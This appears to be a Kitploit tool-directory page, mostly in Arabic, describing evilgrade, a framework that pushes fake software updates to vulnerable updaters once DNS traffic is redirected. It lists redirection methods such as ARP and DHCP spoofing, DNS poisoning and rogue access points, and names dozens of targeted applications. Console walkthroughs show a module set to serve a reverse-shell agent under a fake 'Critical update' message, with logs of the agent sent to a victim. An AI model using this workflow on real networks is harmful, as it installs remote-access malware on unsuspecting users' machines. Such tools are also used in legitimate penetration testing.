Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
evilgrade — Evilgrade هو إطار عمل معياري يسمح للمستخدم باستغلال تطبيقات الترقية الضعيفة عن طريق حقن تحديثات مزيفة. | Kitploit
أدوات/GitHubGitHub/infobyte/evilgrade
أطر الاستغلالتوليد الحمولةبروكسيات الويب والاعتراضاختبار الاختراقالهندسة الاجتماعيةالفريق الأحمرتحليل DNS
GitHubinfobyte/evilgrade

evilgrade

Evilgrade هو إطار عمل معياري يسمح للمستخدم باستغلال تطبيقات الترقية الضعيفة عن طريق حقن تحديثات مزيفة.

عرض المستودع
1.3k27638منذ 5 سنواتتمت المراجعة من قبل Kitploit
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Faraday Security Research -- | ISR-evilgrade | www.faradaysec.com | --

.:: [نظرة عامة موجزة] ::.

Evilgrade هو إطار معياري يسمح للمستخدم بالاستفادة من تطبيقات الترقية الضعيفة عن طريق حقن تحديثات وهمية. يأتي مع برامج ثنائية معدة مسبقًا (عوامل)، وتكوين افتراضي جاهز لاختبارات الاختراق السريعة، وله خادم ويب وخادم DNS خاصان به. سهل إعداد إعدادات جديدة، ويحتوي على تكوين تلقائي عند إعداد عوامل ثنائية جديدة.

* متى يجب استخدام evilgrade؟

يأتي هذا الإطار حيز الاستخدام عندما يتمكن المهاجم من إجراء إعادة توجيه اسم المضيف (التلاعب بحركة DNS الخاصة بالضحية)، ويمكن فعل ذلك في سيناريوهين:

السيناريو الداخلي:
  • الوصول إلى DNS داخلي
  • تزوير ARP
  • تسمم ذاكرة التخزين المؤقت DNS
  • تزوير DHCP
  • اختطاف TCP
  • انتحال نقطة وصول Wi-Fi
السيناريو الخارجي:
  • الوصول إلى DNS داخلي
  • تسمم ذاكرة التخزين المؤقت DNS
* كيف يعمل؟

يعمل Evilgrade مع وحدات، في كل وحدة يوجد هيكل مطبق ضروري لمحاكاة تحديث وهمي لتطبيق/نظام معين.

* ما الأنظمة المدعومة؟

ISR-Evilgrade هو عبر المنصات، يعتمد فقط على وجود حمولة مناسبة للمنصة المستهدفة المراد استغلالها.

الوحدات المنفذة:


  • Freerip 3.30
  • Jet photo 4.7.2
  • Teamviewer 5.1.9385
  • ISOpen 4.5.0
  • Istat.
  • Gom 2.1.25.5015
  • Atube catcher 1.0.300
  • Vidbox 7.5
  • Ccleaner 2.30.1130
  • Fcleaner 1.2.9.409
  • Allmynotes 1.26
  • Notepad++ 5.8.2
  • Java 1.6.0_22 winxp/win7
  • aMSN 0.98.3
  • Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
  • Mirc 7.14
  • Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)
  • Dap 9.5.0.3
  • Winscp 4.2.9
  • AutoIt Script 3.3.6.1
  • Clamwin 0.96.0.1
  • AppTapp Installer 3.11 (Iphone/Itunes)
  • getjar (facebook.com)
  • Google Analytics Javascript injection
  • Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
  • Winamp 5.581
  • TechTracker (cnet) 1.3.1 (Build 55)
  • Nokiasoftware firmware update 2.4.8es - (Windows software)
  • Nokia firmware v20.2.011
  • BSplayer 2.53.1034
  • Apt ( < Ubuntu 10.04 LTS)
  • Ubertwitter 4.6 (0.971)
  • Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
  • Cpan 1.9402
  • VirtualBox (3.2.8 )
  • Express talk
  • Filezilla
  • Flashget
  • Miranda
  • Orbit
  • Photoscape.
  • Panda Antirootkit
  • Skype
  • Sunbelt
  • Superantispyware
  • Trillian <= 5.0.0.26
  • Adium 1.3.10 (Sparkle Framework)
  • VMware
  • more...
  • /docs/CHANGES

.:: [الاستخدام الرئيسي] ::.

يعمل بشكل مشابه لوحدة تحكم IOS``` evilgrade>help Type 'help command' for more detailed help on a command. Commands: configure - Configure - no help available exit - exits the program help - prints this screen, or help on 'command' reload - Reload to update all the modules - no help available restart - Restart webserver - no help available set - Configure variables - no help available show - Display information of . start - Start webserver - no help available status - Get webserver status - no help available stop - Stop webserver - no help available version - Display framework version. - no help available

Object: options - Show options of current module. vhosts - Show VirtualHosts of current module. modules - List all modules available for use. active - Show active modules.

## قائمة الوحدات المُنفَّذة``` console
evilgrade>show modules

List of modules:
===============

...
...
...

- 63 modules available.

تكوين وحدة نمطية محددة``` console

evilgrade>conf sunjava evilgrade(sunjava)>

#### عرض كل VirtualHosts.
#### حقل VirtualHost يحتوي على النطاقات التي سيقوم خادم الويب الخاص بنا بمحاكاتها لنا.``` console
evilgrade>show vhosts

Virtual hosts:
=============

[
  "java.sun.com",
  "javadl-esd.sun.com",
  ...
  ...
  ...
]

عرض خيارات الوحدة الحالية.

agent: هذا هو الثنائي المزيف للتحديث الخاص بنا، يجب علينا تعيين المسار إلى مكان وجوده أو تنفيذ توليد ثنائي تحديث مزيف ديناميكي (انظر ADVANCED).``` console

evilgrade(sunjava)>show options

Display options:

Name = Sun Microsystems Java Version = 2.0 Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"] Description = "" VirtualHost = "java.sun.com|javadl-esd.sun.com"

.-------------------------------------------------------------------------------------------------------------------------. | Name | Default | Description | +--------------+-------------------------------------------------+--------------------------------------------------------+ | website | http://java.com/moreinfolink | Website displayed in the update | | enable | 1 | Status | | atitle | Critical vulnerability | Title name to be displayed in the systray item popup | | arg | | Arg passed to Agent | | adescription | This critical update fix internal vulnerability | Description to be displayed in the systray item popup | | description | This critical update fix internal vulnerability | Description to be displayed during the update | | agent | ./agent/reverseshellsign.exe | Agent to inject | | title | Critical update | Title name displayed in the update | '--------------+-------------------------------------------------+--------------------------------------------------------'

#### بدء الخدمات (DNS Server وWebServer)``` console
evilgrade>start
evilgrade>
[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...
evilgrade>
[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...

#### Waiting for victims

evilgrade>
[25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/update/[.\\d]+/map\\-[.\\d]+.xml"
evilgrade>
[25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/java_update.xml\$"
evilgrade>
[25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: ".exe"
evilgrade>
[25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: "./agent/reverseshell.exe"

عرض سجلات الحالة والضحايا``` console

evilgrade>show status Webserver (pid 4134) already running

Users status:

.---------------------------------------------------------------------------------------------------------------. | Client | Module | Status | Md5,Cmd,File | +----------------+------------------+--------+------------------------------------------------------------------+ | 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" | '----------------+------------------+--------+------------------------------------------------------------------'

## .:: [الاستخدام العميق] ::.

### الأوامر
#### configure / conf - تكوين <module-name>

مثال:
-------``` console
evilgrade>configure sunjava
evilgrade(sunjava)>

evilgrade>conf sunjava
evilgrade(sunjava)>

## 'conf' takes us back to the global configuration
evilgrade(sunjava)>conf
evilgrade>

تنزيل الأداة